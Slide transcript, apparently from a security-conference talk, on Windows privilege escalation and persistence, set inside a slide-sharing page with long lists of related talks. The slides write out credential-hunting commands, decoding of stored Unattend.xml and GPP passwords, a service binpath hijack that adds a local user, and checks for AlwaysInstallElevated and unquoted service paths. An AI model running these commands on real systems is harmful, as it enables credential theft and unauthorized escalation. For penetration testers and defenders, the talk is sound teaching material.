Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Shahriman .
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 

Destaque (6)

SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection Exploited
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 

Semelhante a Windows attacks - AT is the new black

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slidesDocker, Inc.
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
 
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...Amazon Web Services
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程Jimmy Chang
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetAchieve Internet
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Free tools for win server administration
Free tools for win server administrationFree tools for win server administration
Free tools for win server administrationConcentrated Technology
 
Windows guest debugging presentation from KVM Forum 2012
Windows guest debugging presentation from KVM Forum 2012Windows guest debugging presentation from KVM Forum 2012
Windows guest debugging presentation from KVM Forum 2012Yan Vugenfirer
 
Powervc upgrade from_1.3.0.2_to_1.3.2.0
Powervc upgrade from_1.3.0.2_to_1.3.2.0Powervc upgrade from_1.3.0.2_to_1.3.2.0
Powervc upgrade from_1.3.0.2_to_1.3.2.0Gobinath Panchavarnam
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
introduction-infra-as-a-code using terraform
introduction-infra-as-a-code using terraformintroduction-infra-as-a-code using terraform
introduction-infra-as-a-code using terraformniyof97
 
The How and Why of Windows containers
The How and Why of Windows containersThe How and Why of Windows containers
The How and Why of Windows containersBen Hall
 
Moving a Windows environment to the cloud - DevOps Galway Meetup
Moving a Windows environment to the cloud - DevOps Galway MeetupMoving a Windows environment to the cloud - DevOps Galway Meetup
Moving a Windows environment to the cloud - DevOps Galway MeetupGiulio Vian
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsYevgeniy Brikman
 
Modern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDModern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDSean Chittenden
 

Semelhante a Windows attacks - AT is the new black (20)

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.SAP strikes back Your SAP server now counter attacks.
SAP strikes back Your SAP server now counter attacks.
 
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
(ARC402) Deployment Automation: From Developers' Keyboards to End Users' Scre...
 
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
[文件] 華創造型SERVER安裝過程記錄 -V6R2016X 安裝流程
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and Puppet
 
Virtually Pwned
Virtually PwnedVirtually Pwned
Virtually Pwned
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
 
Free tools for win server administration
Free tools for win server administrationFree tools for win server administration
Free tools for win server administration
 
Windows guest debugging presentation from KVM Forum 2012
Windows guest debugging presentation from KVM Forum 2012Windows guest debugging presentation from KVM Forum 2012
Windows guest debugging presentation from KVM Forum 2012
 
Powervc upgrade from_1.3.0.2_to_1.3.2.0
Powervc upgrade from_1.3.0.2_to_1.3.2.0Powervc upgrade from_1.3.0.2_to_1.3.2.0
Powervc upgrade from_1.3.0.2_to_1.3.2.0
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
introduction-infra-as-a-code using terraform
introduction-infra-as-a-code using terraformintroduction-infra-as-a-code using terraform
introduction-infra-as-a-code using terraform
 
The How and Why of Windows containers
The How and Why of Windows containersThe How and Why of Windows containers
The How and Why of Windows containers
 
Testing Terraform
Testing TerraformTesting Terraform
Testing Terraform
 
Moving a Windows environment to the cloud - DevOps Galway Meetup
Moving a Windows environment to the cloud - DevOps Galway MeetupMoving a Windows environment to the cloud - DevOps Galway Meetup
Moving a Windows environment to the cloud - DevOps Galway Meetup
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
 
Modern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSDModern tooling to assist with developing applications on FreeBSD
Modern tooling to assist with developing applications on FreeBSD
 
Azure from scratch part 4
Azure from scratch part 4Azure from scratch part 4
Azure from scratch part 4
 

Mais de Chris Gates

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVChris Gates
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018Chris Gates
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) Chris Gates
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Chris Gates
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackersChris Gates
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Chris Gates
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops Chris Gates
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010Chris Gates
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayChris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Chris Gates
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 

Mais de Chris Gates (20)

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 

Último

DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 

Último (20)

DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 

Windows attacks - AT is the new black

  • 1. Attacks AT is the new BLACK
  • 2. About Me mubix NoVA Hackers Co-founder Marine Corps Hak5 Metasploit Dad Husband
  • 3. About Me cg carnal0wnage NoVA Hackers Co-founder Lares carnal0wnage.attackresearch.com
  • 4. What we're gonna talk about ● Tricks/Misconfigurations as a user ● Escalation from admin-->system ● Persistence ● Forced Authentication ● Misc
  • 5. Encyclopedia of Windows Privilege Escalation By Brett More Ruxcon 2012 http://www.docstoc.com/docs/112350262/Windows-Priv-Esc http://www.youtube.com/watch?v=kMG8IsCohHA This is an addition, lots of good info there that won’t necessarily be covered here.
  • 7. Old Skewl Local Exploits Taviso bug sysret etc More and more are baked into frameworks and run via their agent - MSF, Canvas, Core Impact *normally* not an issue but occasionally not having a .exe to run is a bummer
  • 8. Keyloggers You have to be SYSTEM to get into winlogon for the user. BUT, every time i’ve keylogged (lately) they’ve typed their domain creds into something i could capture as a user.
  • 10. Look For Creds On The Box You might find creds on the box. Examples dir /s *pass* dir /s *cred* dir /s *vnc* dir /s *.config type C:sysprep.inf [clear] type C:sysprepsysprep.xml [base64] Is their truecrypt/PGP drive mapped?
  • 11. Look For Creds On The Box You might find creds on the box. Examples post/windows/gather/credentials/*
  • 12. GPP Group Policy Preference XML files include an encrypted set of credentials (if credentials are used), these are used for new users, making shares, etc etc. The encryption is documented. Free passwords! Source: http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html Original Source (down) : http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences Key: http://msdn.microsoft.com/en-us/library/cc422924.aspx
  • 13. Unattended Installs - Client Unattended.xml is a file that is left on a system after an unattended install, many times setting the local administrator password Usually found in: %WINDIR%PantherUnattend %WINDIR%Panther http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html
  • 14. Unattended Installs - Server No authentication is needed to gather Unattended.xml Just need to find the "Windows Deployment Services" server auxiliary/scanner/dcerpc/windows_deployment _services
  • 15. Unattended Installs - Server Windows Deployment Services aren’t the only methods to do Unattended installs. But the Unattend.xml is a standard. Find it == Win
  • 16. Unattended Installs - Server http://technet.microsoft.com/en- us/library/cc766271(v=ws.10).aspx <LocalAccounts> <LocalAccount wcm:action="add"> <Password> <Value>cAB3AFAAYQBzAHMAdwBvAHIAZAA</Value> <PlainText>false</PlainText> </Password> <Description>Test account</Description> <DisplayName>Admin/Power User Account</DisplayName> <Group>Administrators;Power Users</Group> <Name>Test1</Name> </LocalAccount> cAB3AFAAYQBzAHMAdwBvAHIAZAA == pwPassword (‘pw‘ is the password) Base64 encoded != PlainText ;-)
  • 18. User Permissions Domain User == Local Administrator on the host Domain User == Power User on the host http://blogs.technet.com/b/markrussinovich/archive/2006/05/01/the-power-in-power-users.aspx All Domain Users == Local Admins on all hosts Many Domain Groups = Local Admins on all hosts
  • 19. Binpath Service Modify accesschk.exe -uwcq * | findstr /v AUTHORITY | findstr /v Administrators (remember not all languages spell “Administrators” the same) Binpath mod: sc config badsrvc binpath= "net user bob /add" type= interact sc start badsrvc sc stop badsrvc
  • 21. AlwaysInstallElevated Setting used to allow standard users to install MSI files without having to be admins. HKLMSOFTWAREPoliciesMicrosoftWindows InstallerAlwaysInstallElevated HKCUSOFTWAREPoliciesMicrosoftWindow sInstallerAlwaysInstallElevated
  • 22. Missing Autoruns C:sysinternals>autorunsc.exe -a | findstr /n /R "File not found" 131: File not found: C:Program Files (x86)BlueStacksHD-Service.exe BstHdAndroidSvc Android 338: c:windowsmicrosoft.netframework64v3.0windows communication foundationinfocard.exe 1248: File not found: C:Program Files (x86)BlueStacksHD-Hypervisor- amd64.sys 2262: File not found: System32driverssynth3dvsc.sys 2326: File not found: system32driverstsusbhub.sys 2479: File not found: System32driversrdvgkmd.sys
  • 23. Service Quoting - CVE-2000-1128 wmic service get name,displayname,pathname, startmode |findstr /i "auto" |findstr /i /v "c: windows" |findstr /i /v """ (XP requires admin access to use, Vista+ users can run) Non admin on XP, 1 by 1: sc qc "NVIDIA Update Service Daemon"
